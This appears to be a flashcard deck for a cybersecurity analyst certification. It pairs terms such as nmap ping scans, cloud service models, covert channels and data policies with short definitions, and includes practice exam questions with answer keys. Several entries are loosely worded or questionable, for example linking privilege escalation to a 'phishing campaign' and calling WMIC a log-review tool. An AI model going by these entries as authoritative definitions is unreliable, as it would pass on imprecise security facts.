nmap -sn <IP address>
ping scan to identify which hosts are up and which ones are down (first step)
________ is expressed as a percentage
probability
Risk = (Formula)
probability x magnitude
nmap -PS <PortList> (TCP SYN ping)
probes specific ports from the given listen using a TCP SYN packet instead of an ICMP packet to conduct the ping (useful bc a lot of networks block ICMP packets)
Enumeration
process to identify and scan network ranges and hosts belonging to the target and map out an attack surface (used by both attackers and defenders)
Normalization
process where data is reformatted or restructured to facilitate the scanning and analysis process
Windows Management Instrumentation Command-Line (WMIC- scripting tools)
program used to review log files on a remote Windows machine
Infrastructure as a Service (IaaS)
provides all the hardware, operating system, and backend software needed in order to develop software or services (places the responsibility on the consumer for security of platforms and applications) (cloud service providers are responsible for the CIA of the hardware in the resource pool) (organizational governance is required to control how VMs and containers are provisioned and deprovisioned)
Software as a Service (SaaS)
provides all the hardware, operating system, software, and applications needed for a complete application service to be delivered to the end user (cloud service providers are responsible for the security of the platform and infrastructure) (consumers are responsible for application security, account provisioning, and authorizations)
Committee of Sponsoring Organizations of the Treadway Commission (COSO)
provides guidance on a variety of governance-related topics including fraud, controls, finance, and ethics and relies on COSO's ERM-integrated framework (best practice not a law)
Compensating Control
provides the same (or better) level of protection but uses a different methodology or technology
Platform as a Service (PaaS)
provides your organization with the hardware and software needed for a specific service to operate (consider access control, load balancing, failover, privacy, and protection of data) (always encrypt data stored in a third party solution)
Out-of-band Communication
signals that are sent between two parties or two devices that are sent via a path or method different from that of the primary communication between the two parties or devices
Anti-virus (endpoint protection tool)
software capable of detecting and removing virus infections and (in most cases) other types of malware, such as worms, Trojans, rootkits, adware, spyware, password crackers, network mappers, DoS tools, etc
Data Historian
software that aggregates and catalogs data from multiple sources within an industrial control system (ICS)
Interception Proxy
software that sits between a client and server (MiTM) and allows requests from the client and responses from the server to be analyzed and modified
Decompiler
software that translates a binary or low-level machine language code into higher level code (such as Java)
Fileless Detection Techniques for Malware
techniques that require analysis of the contents of system memory, and of process behavior, rather than relying on scanning the file system
Website Harvesting
techniques used to copy the source code of website files to analyze for information and vulnerabilities
flags (rule options)
tells us whether to match flags in the packet (such as the TCP SYN, the FIN, the reset, etc)
msg (rule options)
text to inform the responder what triggered the rule (basically a comment)
Trusted Execution
the CPU's security extensions invoke a TPM and secure boot attestation to ensure that a trusted operating system is running
Which analysis framework provides the most explicit detail regarding how to mitigate or detect a given threat?
the MITRE ATT&CK Framework
| (regex syntax)
the OR logical operator to match conditions as "this or that"
Port Forwarding
the attacker uses a host as a pivot and is then able to access one of its open TCP/IP ports to send traffic from this port to a port of a host on a different subnet
Enterprise Risk Management (ERM)
the comprehensive process of evaluating, measuring, and mitigating the many risks that pervade an organization
Crash Dump (System Memory Image Acquisition)
the contents of memory are written to a dump file when Windows encounters an unrecoverable kernel error
Dynamic Analysis
the execution of a compiled program to analyze the way it executes and interacts with a system or network (e.g, debugger, stress test, fuzzing)
head syslog.txt
the first 10 lines of the syslog.txt file is displayed
Phishing
the fraudulent practice of sending emails purporting to be from reputable companies in order to induce individuals to reveal personal information, such as passwords and credit card numbers
HTTP Response Codes (URL Analysis)
the header value returned by a server when a client requests a URL (*dont need to memorize codes for exam*)
systemd
the init daemon in Linux that is first executed by the kernel during the boot up process and always has the process ID (PID) of 1
tail syslog.txt
the last 10 lines of the syslog.txt file is displayed
Work Recovery Time (WRT)
the length of time in addition to the RTO of individual systems to perform reintegration and testing of a restored or upgraded system following an event
Recovery Time Objective (RTO)
the length of time it takes AFTER an event to resume normal business operations and activities
Evaluate the following log entry: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Jan 11 05:52:56 lx1 kernel: iptables INPUT drop IN=eth0 OUT= MAC=00:15:5d:01:ca:55:00:15:5d:01:ca:ad:08:00 SRC=10.1.0.102 DST=10.1.0.10 LEN=52 TOS=0x00 PREC=0x00 TTL=128 ID=3988 DF PROTO=TCP SPT=2583 DPT=23 WINDOW=64240 RES=0x00 SYN URGP=0 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Based on this log entry, which of the following statements is true?
the packet was blocked inbound to the network
Pre- and Post-admission Control
the point at which client devices are granted or denied access based on their compliance with a health policy
Time of Check to Time of Use (TOCTTOU)
the potential vulnerability that occurs when there is a change between when an app checked a resource and when the app used the resource (the vulnerability will make the change invalidate the check that was already made)
Asset Tagging
the practice of assigning an ID to assets to associate them with entries in an inventory database
Steganography
the practice of concealing data within another file, message, image, or video
Privilege Escalation
the practice of exploiting flaws in an operating system or other application to gain a greater level of access than was intended for the user or application (phishing campaign)
GET (URL Analysis)
the principal method used with HTTP and is used to retrieve a resource
Data Sovereignty (Data Policies)
the principle that countries and states may impose individual requirements on data collected or stored within their jurisdiction
Data Minimization (Data Policies)
the principle that only necessary and sufficient personal information can be collection and processed for the stated purpose
Purpose Limitation (Data Policies)
the principle that personal information can be collected and processed only for a stated purpose to which the subject has consented (will restrict your ability to transfer data to third parties)
Remediation
the process and procedures that occur if a device does not meet the minimum security policy
Mobile Device Management (MDM)
the process and supporting technologies for tracking, controlling, and securing the organization's mobile infrastructure
System Hardening
the process by which a host or other device is made more secure through the reduction of that device's attack surface area
Data Exfiltration
the process by which an attacker takes data that is stored inside of a private network and moves it to an external network
Reverse Engineering
the process of analyzing the structure of hardware or software to reveal more about how it functions
Security Regression Testing
the process of checking that updates to code do not compromise existing security functionality or capability (enables identification of security mechanisms that worked before but are now broken after the latest changes)
Trend Analysis
the process of detecting patterns within a dataset over time, and using those patterns to make predictions about future events or better understand past events
Hardware Source Authenticity
the process of ensuring that hardware is procured tamper-free from trustworthy suppliers
Piping (|)
the process of using the output of one command as the input for a second command
Change Management
the process through which changes to the configuration of information systems are monitored and controlled, as part of the organization's overall configuration management efforts (focuses on configuration information, patches installed, backup records, incident reports/issues)
Chain of Custody
the record of evidence history from collection, to presentation in court, to disposal
$ (regex syntax)
the regex will only match at the end of a line when searching
^ (regex syntax)
the regex will only match at the start of a line when searching (anchor/boundary character)
Artificial Intelligence (AI)
the science of creating machines with the ability to develop problem solving and analysis strategies without significant human direction or intervention
krbtgt hash
the trust anchor of the Active Directory domain which functions like a private key of a root certificate authority and generates ticket-granting tickets (TGT) that are used by users to access services within Kerberos
Credentialed Scan (Vulnerability Scanner Types)
the vulnerability scanner is given user accounts to log-on to the target systems or hosts (likely to find vulnerabilities and misconfigurations)
Non-credentialed Scan (Vulnerability Scanner Types)
the vulnerability scanner sends test packets against a target without logging onto the system or host (are more appropriate for external assessment of the network perimeter)
Cellebrite (Mobile Device Forensics)
tool focused on evidence extraction from smartphone and other mobile devices, including older feature phones, and from cloud data and metadata using a universal forensic extraction device (UFED)
crontab (crontab -l)
tool that manages cron jobs, the Linux equivalent of scheduled tasks (on Windows)
Service Analysis Tools for Windows
tools that can help identify suspicious service activity even when anti-malware scanners fail to identify it
Dark Nets
unused physical network ports or unused IP address space within a local network often used by attackers
What is an effective way to synchronize time for our logs in a SIEM?
use Coordinated Universal Time (UTC) (time standard not a time zone)
How do you mitigate against different kinds of Covert Channels?
use advanced intrusion detection and user behavior analytics tools are the best option to detecting covert channels, but they will not detect everything
Traceroute (hping)
use arbitrary packet formats, such as probing DNS ports using TCP or UDP, to perform traces when ICMP is blocked on a given network
How do you mitigate rouge devices on your network?
use digital certificates on endpoints and servers to authenticate and encrypt traffic using IPsec or HTTPS
Quotes (" ")
use double quotes to specify an exact phrase and make a search more precise
Social Media Websites (Beaconing)
use of social media platforms messaging functions allow an attacker to live off the land (attackers don't have to create their own tools, instead they send their messages through the social medias APIs and its harder to detect)
What is the best mitigation strategy for data exfiltration?
use strong encryption of data at rest and data in transit
NOT operator
use the minus sign in front of a word or quoted phrase to exclude results that contain that string
AND/OR operator
use these logical operators to require both search items (AND) or to require either search item (OR)
Discovery Scan
used to create and update an inventory of assets by conducting enumeration of the network and its targets without scanning for vulnerabilities (similar to nmap scan) (ping sweep of network)
Timestamping (hping)
used to determine the system's uptime
DELETE (URL Analysis)
used to remove the requested resource
POST (URL Analysis)
used to send data to the server for processing by the requested resource
Framework Profiles
used to supply statements of current cybersecurity outcomes and target cybersecurity outcomes to identify investments that will be most productive in closing the gap in cybersecurity capabilities shown by comparison of the current and target profiles (essentially you want to look at your organization and you want to capture a baseline of where you are in terms of the framework right now - are you low quality or high quality?)
a _______ rootkit might have administrator-level privileges but uses OS features for persistence
user mode
Memorandum of Understanding (MOU)
usually a preliminary or exploratory agreement to express an intent to work together that is not legally binding and does not involve the exchange of money
Query parameters (URL Analysis)
usually formatted as one or more name=value pairs with '&' delimiting each pair
Covert Timing Channel
utilizes one process to alter a system resource so that changes in its response time can signal information to a recipient process
Covert Storage Channel
utilizes one process to write to a storage location and another process to read from that location (by splitting up these processes this type of covert channel cannot be detected by the operating system kernel)
Nikto
vulnerability scanner that can be used to identify known web server vulnerabilities and misconfigurations, identify web applications running on a server, and identify potential known vulnerabilities in those web applications
grep "NetworkManager" /var/log/syslog | cut -d " " -f1-5 | sort -t " " -k3
we are going to search for the word "Network Manager" inside the file, /var/log/syslog (so anytime I find NetworkManager in that syslog file we are going to pipe it and send it to the next command)
How do you mitigate against application-based attacks?
web application firewall (WAF)
Vulnerability scans should be performed at least ________
weekly
When does an injection attack occur?
when the attacker inserts malicious code through an application interface
You are a cybersecurity analyst who has been given the output from a system administrator's Linux terminal. Based on the output provided, which of the following statements is correct? -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- BEGIN OUTPUT ———————--------- # nmap win2k16.local Nmap scan report for win2k16 (192.168.2.15) Host is up (0.132452s latency) Not shown: 997 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http # nc win2k16.local 80 220 win2k16.local DionTraining SMTP Server (Postfix/2.4.1) # nc win2k16.local 22 SSH-2.0-OpenSSH_7.2 Debian-2 # ———————--------- END OUTPUT
your email is running on a non-standard port